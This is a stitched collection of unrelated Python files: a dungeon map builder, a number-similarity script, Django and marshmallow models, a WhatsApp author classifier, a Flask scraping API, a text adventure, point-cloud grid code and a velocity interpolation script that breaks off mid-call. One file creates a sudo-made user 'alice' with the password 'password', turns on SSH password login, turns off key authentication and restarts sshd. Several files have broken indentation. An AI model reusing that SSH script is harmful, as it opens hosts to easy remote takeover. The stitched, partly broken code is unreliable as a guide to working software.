                        # passages were never actually opened.
                        level.layout[x][y].west = True
            y += 1
        y = 0
        x += 1
    return level
def test():
    """Smoke-test: build a 9x9 map key, wire up a Dungeon via auto_map,
    place a player and a creature, and print the map.

    NOTE(review): the Dungeon is created 8x8 while first_map is 9x9, and
    auto_map is called with w = h = 8, so the last row/column of the key is
    ignored -- confirm whether that is intended.
    """
    first_map = [
        [0,1,0,1,1,1,1,0,1],
        [0,1,0,0,0,0,1,1,1],
        [0,1,1,1,1,1,1,1,1],
        [0,1,0,0,0,0,1,0,1],
        [0,0,1,1,1,1,1,0,1],
        [0,1,1,0,0,0,1,0,1],
        [1,1,0,1,1,1,0,0,1],
        [0,1,0,1,0,1,0,0,1],
        [0,1,1,1,0,1,1,1,1],
    ]
    x = Dungeon(8,8)
    y = auto_map(x,first_map,8,8)
    player = Player('seth')
    creature = Creature()
    y.place('p', player, 4, 4)
    y.place('c', creature, 4, 5)
    y.show_map()
#!/usr/bin/python
#from difflib import *
from sys import stdin
#from math import sqrt
def input():
    """Read floats from stdin, one per line; the first value is the target.

    NOTE(review): shadows the `input` builtin and rebinds the name `list` --
    works, but renaming both would be safer.
    :return: (target_number, remaining_values)
    """
    list = []
    #list = stdin.read().split()
    for item in stdin:
        if item == "\n":
            continue
        list.append(float(item))
    # The first number of the stream is the comparison target.
    number = list.pop(0)
    return number, list
def gapInList(dataList):
    """Average absolute gap over every ordered pair of items in dataList.

    Every pair is considered, not just neighbours -- including each item
    paired with itself, so zero self-gaps are part of the average.
    """
    gaps = [abs(second - first) for first in dataList for second in dataList]
    return sum(gaps) / len(gaps)
def gapTargetNumber(targetNumber, dataList):
    """Average absolute distance between targetNumber and each list item."""
    total = sum(abs(targetNumber - item) for item in dataList)
    return total / len(dataList)
def compare(targetNumber, dataList):
    """Average howSimilar() ratio between targetNumber and every list item."""
    x = []
    for value in dataList:
        #x.append(abs(value - targetNumber))
        x.append(abs(howSimilar(targetNumber, value)))
    """
    #----- check outliers
    for i in x:
        if gap(x)
    #-----
    """
    #print "-"*20
    return sum(x)/len(x)
def howSimilar(value_1, value_2):
    """Similarity of two numbers as the ratio smaller / larger.

    For same-sign inputs the result lies in [0, 1], with 1.0 meaning equal.
    Raises ZeroDivisionError when the larger value is 0.
    https://stackoverflow.com/questions/26109959/get-the-similarity-of-two-numbers-with-python
    """
    smaller, larger = sorted((value_1, value_2))
    return abs(float(smaller) / float(larger))
if __name__ == "__main__":
number, list = input()
print "Targeted number: %s" % number
print "There is a similarity of: %s %%" % (compare(number,list)*100)
print "-"*30
x = gapTargetNumber(number,list)
print "Average gap between targeted number and list: %s" % x
y = gapInList(list)
print "Average gap between item in list: %s" % y
print "The gaps similarity is: %s %%" % (howSimilar(x,y)*100)
|
from django.db import models
from accounts.models.auth_user import AuthUser
from managers.base_manager import BaseManager
class User(models.Model):
    """Additional profile data attached 1:1 to an AuthUser (shares its PK)."""
    auth_user = models.OneToOneField(
        AuthUser,
        on_delete=models.CASCADE,
        related_name="additional_data",
        primary_key=True,
    )
    # Required date of birth.
    date_birth = models.DateField()
    # Free-form address, capped at 50 characters.
    address = models.CharField(
        max_length=50
    )
    objects = BaseManager()
    @property
    def username(self):
        """Expose the related auth user's username."""
        return self.auth_user.username
    def __str__(self):
        return self.username
|
import argparse
import pandas as pd
from textlib.whatsapp import helper
from textlib.whatsapp import general
import emoji as em
from textlib.whatsapp import testhelper
from sklearn.preprocessing import LabelEncoder
from sklearn.feature_extraction.text import TfidfVectorizer
from xgboost import XGBClassifier
from sklearn import model_selection, preprocessing, linear_model, naive_bayes, metrics, svm
from sklearn.model_selection import train_test_split
import numpy as np
def parse_arguments() -> argparse.Namespace:
    """ Parse command line inputs """
    parser = argparse.ArgumentParser(description='Character')
    parser.add_argument('--trainfile', required=True,
                        help='The name of the whatsapp export file')
    parser.add_argument('--testfile', required=True,
                        help='The name of the test whatsapp text file with only texts')
    return parser.parse_args()
def main():
    """Train an XGBoost author classifier on a WhatsApp export and predict
    the author of the text in the test file."""
    args = parse_arguments()
    # Load data
    df = helper.import_data(f'{args.trainfile}')
    df = helper.preprocess_data(df)
    # Collect the emojis of each message and append them to the text-only column.
    temp=df['Message_Clean']
    l=[]
    for i in temp:
        x=''
        for c in i:
            # NOTE(review): em.UNICODE_EMOJI was removed in emoji>=2.0
            # (replaced by em.EMOJI_DATA); this code pins an older emoji lib.
            if c in em.UNICODE_EMOJI:
                x=x+c
        l.append(x)
    df['emojis']=l
    df['Message_Only_Text']=df['Message_Only_Text']+df['emojis']
    dftest= testhelper.import_data(f'{args.testfile}')
    corpus=[i for i in df['Message_Only_Text']]
    y = df['User']
    # Encode author names as integer class labels.
    labelencoder = LabelEncoder()
    y = labelencoder.fit_transform(y)
    # Append the test message so it is vectorized with the same vocabulary.
    tes=dftest['Message_Only_Text']+dftest['emojis']
    corpus.append(tes)
    TV=TfidfVectorizer(max_features = 50)
    XT = TV.fit_transform(corpus).toarray()
    X=XT[:-1]  # training rows only; the appended test message is XT[-1]
    X_train, X_val, y_train, y_val = train_test_split(X, y, test_size = 0.05)
    # BUGFIX: the prediction input must be the appended test vector XT[-1];
    # the original took X[-1], i.e. the last *training* message.
    xtest=np.array([XT.tolist()[-1]])
    model = XGBClassifier()
    model.fit(X_train, y_train)
    y_pred = model.predict(xtest)
    # Map the predicted class label back to the author name.
    name=labelencoder.inverse_transform(y_pred)
    print (name.tolist()[0])
    return
if __name__ == "__main__":
    main()
|
from marshmallow import Schema, fields, EXCLUDE, validate
class SuccessSchema(Schema):
    """Generic success response: a single result string."""
    result = fields.String()
class BadRequestSchema(Schema):
    """Error response carrying a numeric error code."""
    error = fields.Integer()
class FibNumber(Schema):
    """Request schema: N, the index into the Fibonacci sequence."""
    N = fields.Integer()
class FibNumbersList(Schema):
    """Response schema: the computed Fibonacci sequence."""
    fibonacci_sequence = fields.List(fields.Integer())
class GenerateDict(Schema):
    """Totals serialized as strings.

    NOTE(review): 'total_deciaml' is a typo for 'total_decimal', but the field
    name is part of the wire format -- renaming it would break existing
    consumers, so coordinate any fix with clients first.
    """
    total_int = fields.String()
    total_deciaml = fields.String()
class BookSchema(Schema):
    """Book payload: name (5-50 chars, required) and optional author id."""
    name = fields.String(required=True, validate=validate.Length(min=5, max=50))
    author_id = fields.Integer()
    class Meta:
        # Silently drop unknown keys instead of raising a ValidationError.
        unknown = EXCLUDE
|
from collections import deque
# Food-ordering queue: serve customer orders FIFO while stock lasts.
existing_food = int(input())
line = map(int, input().split())
customers = deque(line)
# Print the largest single order first.
print(max(customers))
is_complete = True
while len(customers) > 0:
    order = customers[0]
    if order <= existing_food and is_complete:
        existing_food -= order
        customers.popleft()
    else:
        # Stock exhausted: report every remaining order.
        # NOTE(review): the "Orders left:" prefix is printed once per remaining
        # customer; confirm against the expected judge output format.
        print(f"Orders left: {order}", end=" ")
        customers.popleft()
        is_complete = False
if is_complete:
    print("Orders complete")
|
#-*- coding: utf-8 -*-
from scraping import bdd
from flask import Flask, request, jsonify, redirect
from flask_restful import Resource, Api, output_json
from scraping.lib import get_data
class UnicodeApi(Api):
    """flask_restful Api subclass that emits JSON as UTF-8 rather than
    ASCII-escaped sequences."""
    def __init__(self, *args, **kwargs):
        super(UnicodeApi, self).__init__(*args, **kwargs)
        # Keep non-ASCII characters literal in JSON responses.
        self.app.config['RESTFUL_JSON'] = {
            'ensure_ascii': False
        }
        # Serve responses with an explicit utf-8 charset content type.
        self.representations = {
            'application/json; charset=utf-8': output_json
        }
class ListAPI(Resource):
    """Top-level index: returns the `bdd.listAPI` collection as JSON."""

    def get(self):
        # FIX: the parameter was misspelled "selt"; it only worked because the
        # method never used it. Renamed to the conventional "self".
        return jsonify(bdd.listAPI)
# First selection level
class GameListAPI(Resource):
    """Returns the `bdd.games` collection as JSON."""
    def get(self):
        return jsonify(bdd.games)
class SoftwareListAPI(Resource):
    """Returns the `bdd.softwares` collection as JSON."""
    def get(self):
        return jsonify(bdd.softwares)
# Second selection level
class Nintendo3DSListAPI(Resource):
    """Returns the `bdd.nintendo3DS` collection as JSON."""
    def get(self):
        return jsonify(bdd.nintendo3DS)
class Playstation4ListAPI(Resource):
    """Returns the `bdd.playstation4` collection as JSON."""
    def get(self):
        return jsonify(bdd.playstation4)
class KeyboardMouseListAPI(Resource):
    """Returns the `bdd.keyboardMouse` collection as JSON."""
    def get(self):
        return jsonify(bdd.keyboardMouse)
class PCComponentListAPI(Resource):
    """Returns the `bdd.pccomponent` collection as JSON."""
    def get(self):
        return jsonify(bdd.pccomponent)
# Selection the web page to scrap
class Playstation4API(Resource):
    """Scrapes one PS4 entry: delegates to get_data() with the playstation4 collection."""
    def get(self, data_id):
        result = get_data(bdd=bdd.playstation4, data_id=data_id)
        return result
class Nintendo3DSAPI(Resource):
    """Scrapes one 3DS entry: delegates to get_data() with the nintendo3DS collection."""
    def get(self, data_id):
        result = get_data(bdd=bdd.nintendo3DS, data_id=data_id)
        return result
class KeyboardMouseAPI(Resource):
    """Scrapes one keyboard/mouse entry via get_data()."""
    def get(self, data_id):
        result = get_data(bdd=bdd.keyboardMouse, data_id=data_id)
        return result
class PCComponentAPI(Resource):
    """Scrapes one PC-component entry via get_data()."""
    def get(self, data_id):
        result = get_data(bdd=bdd.pccomponent, data_id=data_id)
        return result
class CameraListAPI(Resource):
    """Returns the `bdd.camera` collection as JSON."""
    def get(self):
        return jsonify(bdd.camera)
class CameraAPI(Resource):
    """Scrapes one camera entry via get_data()."""
    def get(self, data_id):
        result = get_data(bdd=bdd.camera, data_id=data_id)
        return result
def main():
    """Build the Flask app, register every scraping endpoint, and run it."""
    app = Flask(__name__)
    api = UnicodeApi(app)

    @app.route('/')
    def redirectIndex():
        # Send the bare root to the API index.
        return redirect('/rakutenscraping/api/v1.0/', code=302)

    base = '/rakutenscraping/api/v1.0/'
    routes = [
        (ListAPI, base),
        (SoftwareListAPI, base + 'software'),
        (KeyboardMouseListAPI, base + 'software/keyboardmouse'),
        (KeyboardMouseAPI, base + 'software/keyboardmouse/<string:data_id>'),
        (PCComponentListAPI, base + 'software/pccomponent'),
        (PCComponentAPI, base + 'software/pccomponent/<string:data_id>'),
        (CameraListAPI, base + 'software/camera'),
        (CameraAPI, base + 'software/camera/<string:data_id>'),
        (GameListAPI, base + 'games'),
        (Nintendo3DSListAPI, base + 'games/3DS'),
        (Nintendo3DSAPI, base + 'games/3DS/<string:data_id>'),
        (Playstation4ListAPI, base + 'games/PS4'),
        (Playstation4API, base + 'games/PS4/<string:data_id>'),
    ]
    for resource, url in routes:
        api.add_resource(resource, url)
    app.run()
# Start the scraping API server when executed directly.
if __name__ == '__main__':
    main()
|
import numpy as np
import matplotlib.pyplot as plt
import pymc3 as pm
from pymc3 import DiscreteUniform, Normal, Exponential, Poisson, traceplot, Uniform, StudentT
from pymc3.math import switch
import scipy.stats as scs
from pymc3.backends.base import merge_traces
from pymc3 import *
import matplotlib
# Synthetic switchpoint-style data: 40 early attempts centred on 270 and 30
# later attempts centred on 220 (the segment times drop at some point).
# NOTE(review): the draws are unseeded, so the figure differs on every run.
data2early = scs.norm.rvs(loc=270,scale=10,size=40)
data2late = scs.norm.rvs(loc=220,scale=10,size=30)
data2 = np.append(data2early,data2late)
attempts = data2.shape[0]
# Bar chart of each attempt's elapsed time.
fig = plt.figure(figsize=(12.5, 3.5))
ax = fig.add_subplot(111)
plt.bar(np.arange(0,attempts),data2,color="#348ABD")
plt.xlabel("Effort Number")
plt.ylabel("Elapsed Time")
plt.title("Runner Segment Completion Times")
plt.xlim(0,attempts)
# Red rectangle drawn over attempts 35-45 plus an arrow annotation.
rec_points_x = [35,35,45,45 ,35]
rec_points_y = [150,290,290,150,150]
plt.plot(rec_points_x,rec_points_y,c='red')
ax.quiver(49,290,-25,-10)
# The PyMC3 switchpoint model below is kept for reference but disabled.
# runner_model = pm.Model()
# with runner_model:
#     switchpoint = DiscreteUniform('switchpoint',lower=0, upper=attempts)
#
#     early_mean = StudentT('early_mean',mu=250,sd=10,nu=5)
#     late_mean = StudentT('late_mean',mu=250,sd=10,nu=5)
#
#     rate = switch(switchpoint >= np.arange(attempts),early_mean,late_mean)
#
#     disasters = StudentT('disasters',mu=rate,sd=10,nu=5,observed=data2)
#
#     startvals = find_MAP(model=runner_model)
#     trace = pm.sample(10000,start=startvals,njobs=10)
#     traceplot(trace,varnames=['early_mean','late_mean','switchpoint'])
plt.show()
|
from room import Room
from player import Player
# Instantiate rooms
# Map of room id -> Room(name, description); ids are referenced by the exit
# wiring and the player setup below.
rooms = {
    'outside':  Room("Outside Cave Entrance",
                     "North of you, the cave mount beckons"),

    'foyer':    Room("Foyer", """Dim light filters in from the south. Dusty
passages run north and east."""),

    'overlook': Room("Grand Overlook", """A steep cliff appears before you, falling
into the darkness. Ahead to the north, a light flickers in
the distance, but there is no way across the chasm."""),

    'narrow':   Room("Narrow Passage", """The narrow passage bends here from west
to north. The smell of gold permeates the air."""),

    'treasure': Room("Treasure Chamber", """You've found the long-lost treasure
chamber! Sadly, it has already been completely emptied by
earlier adventurers. The only exit is to the south."""),
}
# Define allowed movement between rooms.
# BUG FIX: the dict above is named `rooms`; the original referenced an
# undefined `room`, raising NameError as soon as the module was imported.
rooms['outside'].n_to = rooms['foyer']
rooms['foyer'].s_to = rooms['outside']
rooms['foyer'].n_to = rooms['overlook']
rooms['foyer'].e_to = rooms['narrow']
rooms['overlook'].s_to = rooms['foyer']
rooms['narrow'].w_to = rooms['foyer']
rooms['narrow'].n_to = rooms['treasure']
rooms['treasure'].s_to = rooms['narrow']
# Dictionary to convert from letters to words, for use in output.
direction_letter_name = {'n': 'North', 'e': 'East', 's': 'South', 'w': 'West'}
# Collection of allowed direction letters.
direction_letters = direction_letter_name.keys()
def direction_letter_to_word(dir_letter):
    """Translate a direction letter ('n'/'e'/'s'/'w') into its full word; raises KeyError otherwise."""
    return direction_letter_name[dir_letter]
def is_movement_possible(direction):
    """Return True when the player's current room has an exit attribute `<direction>_to`.

    NOTE(review): relies on a module-level `player_1`, which is only assigned
    inside __main__() as a local — confirm it is made global before this runs.
    """
    possible_movement_attribute = direction + '_to'
    return hasattr(player_1.current_room, possible_movement_attribute)
def move(direction):
    """Advance the player through the exit matching `direction` (e.g. 'n' -> n_to)."""
    exit_attribute = '{}_to'.format(direction)
    player_1.current_room = getattr(player_1.current_room, exit_attribute)
def game_loop():
    """Main REPL: describe the current room, read a command, act on it."""
    while True:
        print()
        # Show where the player is and what it looks like.
        print(f'You are currently in room {player_1.current_room.name}.')
        print(f'{player_1.current_room.description}')
        action = input('What shall we do?')
        if action == 'q':
            # Player asked to quit: say goodbye and leave the loop.
            print("You did super! See you again, soon!")
            return
        if action not in direction_letters:
            # Anything other than a direction or 'q' is invalid input.
            print("Please enter one of [n, e, s, w, q (for quit).]")
            continue
        if is_movement_possible(action):
            print(f'We boldly go {direction_letter_name[action]}!')
            move(action)
        else:
            # Movement in the desired direction is not allowed.
            print(f'Stymied! There is no way to move {direction_letter_name[action]}!')
def __main__():
    """Create the player outside the cave and start the game loop.

    BUG FIXES: the room dict is named `rooms` (the original `room` raised
    NameError), and `player_1` must be a module global because game_loop(),
    move() and is_movement_possible() all read it at module scope.
    """
    global player_1
    player_1 = Player(rooms['outside'])
    game_loop()


# BUG FIX: the original defined __main__() but never called it, so running
# the script did nothing.
if __name__ == '__main__':
    __main__()
from typing import List
from .candidatePath import CandidatePath
class Policy(object):
    """A named, coloured policy made up of candidate paths."""

    name: str
    color: int
    paths: List[CandidatePath]

    def __init__(self,
                 name: str,
                 color: int,
                 paths: List[CandidatePath]):
        self.name = name
        self.color = color
        self.paths = paths

    def __str__(self):
        joined_paths = ",".join(str(path) for path in self.paths)
        return "Policy %s with color %d leads to {%s}" % (self.name,
                                                          self.color,
                                                          joined_paths)

    def json(self):
        # Hand-rolled serialisation: the object's closing brace is the final
        # character of the appended '"]}"' fragment.
        paths_json = "[" + ",".join(path.json() for path in self.paths) + "]}"
        return '{"name": "%s", "color": %d, "paths": %s' % (self.name,
                                                            self.color,
                                                            paths_json)

    @classmethod
    def parse_json(cls, values: dict):
        """Inverse of json(): build a Policy from an already-parsed dict."""
        parsed_paths = [CandidatePath.parse_json(item) for item in values["paths"]]
        return Policy(values["name"], values["color"], parsed_paths)
|
import os
import pexpect
os.system("sudo useradd alice")
child = pexpect.spawn("sudo passwd alice")
child.expect("Enter new UNIX password: ")
child.sendline("password")
child.expect("Retype new UNIX password: ")
child.sendline("password")
#os.system("sudo chown -R alice /home/alice")
#os.system("sudo chgrp -R alice /home/alice")
ssh_config_file = open("/etc/ssh/sshd_config", "r")
new_ssh_config_file = open("/etc/ssh/sshd_config_2", "w")
count = 1
ports = []
for line in ssh_config_file:
if count == 54:
new_ssh_config_file.write("PasswordAuthentication yes\n")
elif count == 33:
new_ssh_config_file.write("RSAAuthentication no\n")
elif count == 34:
new_ssh_config_file.write("PubkeyAuthentication no")
else:
new_ssh_config_file.write(line)
count += 1
ssh_config_file.close()
new_ssh_config_file.close()
os.system("sudo mv /etc/ssh/sshd_config_2 /etc/ssh/sshd_config")
os.system("sudo service ssh restart")
|
import numpy as np
import pyvista as pv
from pyvista import examples
from operator import itemgetter
#mesh = examples.download_teapot()
#mesh.plot(cpos=[-1, 2, -5], show_edges=True)
# Configuration
'''
N = 3
GRID_SIZE = N * N * N
'''
# Extract points, bounds
# Define some helpers - ignore these and use your own data!
'''
dataset_teapot = examples.download_teapot()
dataset_bunny = examples.download_bunny_coarse()
'''
def generate_points(dataset=None, subset=1):
    """A helper to make a 3D NumPy array of points (n_points by 3).

    Samples `subset` * n_points random point ids from `dataset` and returns
    (points, bounds), both shifted so the dataset's center sits at the origin.

    BUG FIX: the original default `dataset=examples.download_teapot()` ran the
    download once at import time and shared that single object across every
    default call; the download now happens lazily per call.
    """
    if dataset is None:
        dataset = examples.download_teapot()
    ids = np.random.randint(low=0, high=dataset.n_points-1,
                            size=int(dataset.n_points * subset))
    # Copy into a plain list: we mutate the bounds below, and dataset.bounds
    # may be shared with (or read-only on) the dataset — TODO confirm.
    bounds = list(dataset.bounds)  # x, y, z
    center = dataset.center
    points = dataset.points[ids]
    # Center Align
    center = np.array(center).reshape(-1, 3)
    points = points - center
    # Bounds Align: shift each min/max pair by the matching center coordinate.
    bounds[0] = bounds[0] - center[0][0]
    bounds[1] = bounds[1] - center[0][0]
    bounds[2] = bounds[2] - center[0][1]
    bounds[3] = bounds[3] - center[0][1]
    bounds[4] = bounds[4] - center[0][2]
    bounds[5] = bounds[5] - center[0][2]
    return points, bounds
# TODO: refactor this section into reusable functions.
def generate_grid(points, bounds, N = 3):
    """Bucket `points` into an N x N x N spatial grid covering `bounds`.

    Returns (grid, grid_bounds): grid[i][j][k] is a dict holding the cell's
    "element" point list plus a 2-slot "child" list (filled later by
    generate_tree); grid_bounds[i][j][k] is the cell's
    [xmin, xmax, ymin, ymax, zmin, zmax].

    NOTE(review): cells are only initialised inside the per-point loop, so
    with empty `points` every cell stays None; points exactly on an upper
    bound fall into no cell because the interval tests are half-open.
    """
    grid = np.ndarray((N,N,N), dtype = dict).tolist()
    grid_bounds = np.ndarray((N,N,N), dtype = list).tolist()
    # Precompute each cell's axis-aligned bounding box.
    for i in range(N):
        xAxis = (bounds[1] - bounds[0]) / N * (i + 1) + bounds[0]
        for j in range(N):
            yAxis = (bounds[3] - bounds[2]) / N * (j + 1) + bounds[2]
            for k in range(N):
                zAxis = (bounds[5] - bounds[4]) / N * (k + 1) + bounds[4]
                grid_bounds[i][j][k] = [xAxis - (bounds[1] - bounds[0]) / N, xAxis, yAxis - (bounds[3] - bounds[2]) / N, yAxis, zAxis - (bounds[5] - bounds[4]) / N, zAxis]
    # Assign every point to the (at most one) cell whose box contains it.
    for point in points:
        for i in range(N): # x
            for j in range(N): # y
                for k in range(N): # z
                    # Grid initialize
                    if grid[i][j][k] is None:
                        grid[i][j][k] = {
                            "element": [],
                            "child": [None] * 2,
                        }
                    if point[0] >= grid_bounds[i][j][k][0] and point[0] < grid_bounds[i][j][k][1] and point[1] >= grid_bounds[i][j][k][2] and point[1] < grid_bounds[i][j][k][3] and point[2] >= grid_bounds[i][j][k][4] and point[2] < grid_bounds[i][j][k][5]:
                        grid[i][j][k]["element"].append(point)
    return grid, grid_bounds
# Test
'''
teapot_points, teapot_bounds = generate_points(dataset_teapot)
bunny_points, bunny_bounds = generate_points(dataset_bunny)
teapot_grid, teapot_grid_bounds = generate_grid(teapot_points, teapot_bounds, N)
bunny_grid, bunny_grid_bounds = generate_grid(bunny_points, bunny_bounds, N)
'''
def geneate_grid_clustering(source_grid, destination_grid, N = 3):
    """Pair up each source/destination grid cell and cluster the pair.

    NOTE(review): the name is missing an 'r' ("geneate"); renaming it would
    break existing callers, so the typo is only flagged here.
    """
    for i in range(N):
        for j in range(N):
            for k in range(N):
                sorted_clustering(source_grid[i][j][k], destination_grid[i][j][k])
def sorted_clustering(source_grid, destination_grid):
    """Sort both cells' points lexicographically (x, y, z) and build a binary
    split tree over each cell via generate_tree().

    Raises NotImplementedError when exactly one of the two cells is empty
    (an unmatchable 0:N pairing) — the grid resolution N must be lowered.
    """
    # When exactly one of the two cells has no points (0:N or N:0 matching).
    if (not source_grid["element"]) ^ (not destination_grid["element"]):
        print("Error : N의 값을 낮춰야한다.")
        raise NotImplementedError
    source_grid["element"] = sorted(source_grid["element"], key = itemgetter(0, 1, 2))
    generate_tree(source_grid)
    destination_grid["element"] = sorted(destination_grid["element"], key = itemgetter(0, 1, 2))
    generate_tree(destination_grid)
def generate_tree(tree):
    """Recursively split tree["element"] (a sorted point list) into a binary
    tree whose leaves each hold exactly one point.

    BUG FIXES vs. the original:
    * `len(...) is not 1` compared identity, not equality — it only worked
      via CPython's small-int cache; replaced with a `<` comparison.
    * `tree is not None` was evaluated *after* `tree["element"]`, so a None
      tree crashed before the guard could run.
    * An empty element list recursed forever (splitting [] into [] and []);
      recursion now stops for any list with fewer than two points.
    """
    if tree is None or len(tree["element"]) < 2:
        return
    mid = len(tree["element"]) // 2
    tree["child"][0] = {"element": tree["element"][:mid], "child": [None] * 2}
    tree["child"][1] = {"element": tree["element"][mid:], "child": [None] * 2}
    tree["element"] = None
    generate_tree(tree["child"][0])
    generate_tree(tree["child"][1])
|
import cv2
import numpy as np
img = cv2.imread('home.jpg')
''' file name : pyramids.py
Description : This sample shows how to downsample and upsample images
This is Python version of this tutorial : http://opencv.itseez.com/doc/tutorials/imgproc/pyramids/pyramids.html#pyramids
Level : Beginner
Benefits : Learn to use 1) cv2.pyrUp and 2) cv2.pyrDown
Usage : python pyramids.py
Written by : Abid K. (abidrahman2@gmail.com) , Visit opencvpython.blogspot.com for more tutorials '''
# NOTE(review): Python 2 script (print statements); `img` is loaded twice, and
# the 'd' prompt presumably should read "Press d to zoom out".
print " Zoom In-Out demo "
print " Press u to zoom "
print " Press d to zoom "
img = cv2.imread('home.jpg')
# Interactive loop: 'u' doubles the image via pyrUp, 'd' halves it via
# pyrDown, Esc (key code 27) exits.
while(1):
    h,w = img.shape[:2]
    cv2.imshow('image',img)
    k = cv2.waitKey(10)
    if k==27 :
        break
    elif k == ord('u'): # Zoom in, make image double size
        img = cv2.pyrUp(img,dstsize = (2*w,2*h))
    elif k == ord('d'): # Zoom down, make image half the size
        img = cv2.pyrDown(img,dstsize = (w/2,h/2))
cv2.destroyAllWindows()
|
import os
import csv
import argparse
import sys
import pandas as pd
from scipy.spatial.transform import Rotation as R
from scipy.spatial.transform import Slerp
import numpy as np
TIME_COLUMN = 'TimeStamp'
INTERPOLABLE_VEL_COLUMNS = ['vx', 'vy', 'vz', 'vyaw']
INTERPOLABLE_QUAT_COLUMNS = ['odom.quaternion.x', 'odom.quaternion.y', 'odom.quaternion.z', 'odom.quaternion.w']
IMAGE_COLUMNS = [TIME_COLUMN, 'ImageFile']
RESULT_COLUMNS = INTERPOLABLE_VEL_COLUMNS
def get_quat(record):
    """Extract the odometry quaternion as np.array([x, y, z, w]) from a
    dict-like row.

    FIX: the parameter was named `dict`, shadowing the builtin; renamed.
    """
    q_x = record['odom.quaternion.x']
    q_y = record['odom.quaternion.y']
    q_z = record['odom.quaternion.z']
    q_w = record['odom.quaternion.w']
    return np.array([q_x, q_y, q_z, q_w])
def get_vel(record):
    """Extract the linear velocity as np.array([vx, vy, vz]) from a dict-like row.

    FIX: the parameter was named `dict`, shadowing the builtin; renamed.
    """
    v_x = record['vx']
    v_y = record['vy']
    v_z = record['vz']
    return np.array([v_x, v_y, v_z])
def get_abspath(filename):
    """Resolve `filename` relative to this script's directory to an absolute path."""
    script_dir = os.path.dirname(__file__)
    return os.path.abspath(os.path.join(script_dir, './{}'.format(filename)))
def create_image_path(image_file_name, image_folder_path):
    """Return the absolute path of an image file inside the images folder."""
    joined = os.path.join(image_folder_path, image_file_name)
    return os.path.abspath(joined)
def create_suffixed_file(file_path, suffix):
    """Insert `_<suffix>` before the extension: /a/b.txt -> /a/b_<suffix>.txt."""
    root, extension = os.path.splitext(file_path)
    return f'{root}_{suffix}{extension}'
def interpolate(v0, v1, t):
    """Linear interpolation between v0 and v1 at parameter t, rounded to 8 dp."""
    blended = (1 - t) * v0 + t * v1
    return round(blended, 8)
def normalize(v0, v1, x):
    """Map x from the interval [v0, v1] onto [0, 1] (no clamping)."""
    span = v1 - v0
    return (x - v0) / span
def interpolate_record(record1, record2, image_record):
    """
    Returns result record with interpolated values.

    record1/record2 are velocity rows bracketing image_record in time.
    Velocities are linearly interpolated at the image timestamp, the
    body->world rotation is slerped between the two quaternions, and the
    interpolated world-frame velocity is rotated back into the body frame.
    Returns a dict with keys 'vx', 'vy', 'vz', 'vyaw'.
    """
    # interpolate velocities
    interpolated_vel_record = {}
    # t in [0, 1]: where the image timestamp sits between the two records.
    t = normalize(record1[TIME_COLUMN], record2[TIME_COLUMN], image_record[TIME_COLUMN])
    for col in INTERPOLABLE_VEL_COLUMNS:
        interpolated_vel_record[col] = interpolate(record1[col], record2[col], t)
    # interpolate rotations of the body frame
    q0 = get_quat(record1)
    q1 = get_quat(record2)
    key_rots = R.from_quat([q0, q1])
    key_times = [0, 1]
    time_interp = [t]
    slerp = Slerp(key_times, key_rots)
    interp_rot = slerp(time_interp)
    v_world = get_vel(interpolated_vel_record)
    # apply rotation to the velocity vector
    # needs to be inverse because we interpolated the rotation matrix from body -> world
    # and what we're doing here is going from world -> body
    v_body = interp_rot.apply(v_world, inverse=True)[0]
    # put everything back in dict in body coords
    interpolated_vel_body = {}
    interpolated_vel_body['vx'] = v_body[0]
    interpolated_vel_body['vy'] = v_body[1]
    interpolated_vel_body['vz'] = v_body[2]
    # Yaw rate is kept as interpolated; it is not rotated with the others.
    interpolated_vel_body['vyaw'] = interpolated_vel_record['vyaw']
    return interpolated_vel_body
def find_closest_rows(value, iterator):
    """Advance `iterator` (iterrows-style (index, row) pairs) until it
    brackets `value` on TIME_COLUMN.

    Returns (v1, v2): the last row with time <= value and the first row with
    time > value; either may be None when the bracket is incomplete. The
    iterator is consumed, so subsequent calls continue after v2 — callers
    rely on timestamps increasing across calls.

    FIX: removed the unused `r1, r2` locals and folded the two mutually
    exclusive elif branches (whose `>= value` tests were always true once
    `<= value` failed) into a plain if/else.
    """
    v1, v2 = None, None
    for _, row in iterator:
        if row[TIME_COLUMN] <= value:
            v1 = row
        elif v1 is not None:
            # Row is past `value` and a lower bound exists: bracket complete.
            v2 = row
            break
        else:
            # First row already past `value`: no lower bound exists.
            break
    return v1, v2
def split_test_training_data(file_paths, lines_number, test_split=0.2):
    """Split each file into <name>_test / <name>_train by line position, then
    delete the source file.

    The first int(lines_number * test_split) + 1 lines go to the test file
    (the original used `i <= test_number`; kept for compatibility), the rest
    to the train file.

    FIX: the original leaked all three file handles on any exception; the
    handles are now managed by `with` so they always close.
    """
    test_number = int(lines_number * test_split)
    for file_path in file_paths:
        with open(file_path, 'r') as f, \
                open(create_suffixed_file(file_path, 'test'), 'w') as f_test, \
                open(create_suffixed_file(file_path, 'train'), 'w') as f_train:
            for i, line in enumerate(f):
                target = f_test if i <= test_number else f_train
                target.write(line)
        os.remove(file_path)
def process(
    velocities,
    images,
    result_velocities_file_path,
    result_images_file_path,
    images_folder_path):
    """
    Process velocities and images frames.
    For each row in images:
    1) Match 2 closest by timestamp velocities rows to the image record.
    2) Calculate normalized parameter t: image_time - vt1 / vt2 - vt1.
       vt1, vt2: velocity records timestamps
    3) Interpolate velocities values using t.
    4) Create new row using image timestamp, image and interpolated values.

    NOTE(review): the single shared velocity_iterator is consumed across
    calls to find_closest_rows, so both frames must be sorted by timestamp —
    confirm upstream. Neither DictWriter emits a header row, and the output
    files are not closed if an exception interrupts the loop.
    """
    velocity_iterator = velocities.iterrows()
    f_velocities = open(result_velocities_file_path, 'w+')
    f_images = open(result_images_file_path, 'w+')
    writer_v = csv.DictWriter(f_velocities, RESULT_COLUMNS, delimiter=',')
    writer_i = csv.DictWriter(f_images, ['ImageFile'], delimiter=',')
    row_counter, missed = 0, 0
    for _, image_row in images.iterrows():
        if row_counter % 1000 == 0:
            print('{} out of {} images processed -> {}%'.format(row_counter, images.shape[0], 100.0*row_counter/images.shape[0]))
        v1, v2 = find_closest_rows(image_row[TIME_COLUMN], velocity_iterator)
        # print('{}'.format(v1['TimeStamp'] - image_row[TIME_COLUMN]))
        # Skip images that have no bracketing velocity records.
        if v1 is None or v2 is None:
            continue
        interpolated = interpolate_record(v1, v2, image_row)
        # NOTE(review): incremented before the image-existence check, so the
        # progress count includes images that end up skipped as missing.
        row_counter += 1
        image_path = create_image_path(
            image_row['ImageFile'],
            images_folder_path
        )
        if not os.path.isfile(image_path):
            missed += 1
            continue
        writer_v.writerow(interpolated)
        writer_i.writerow({
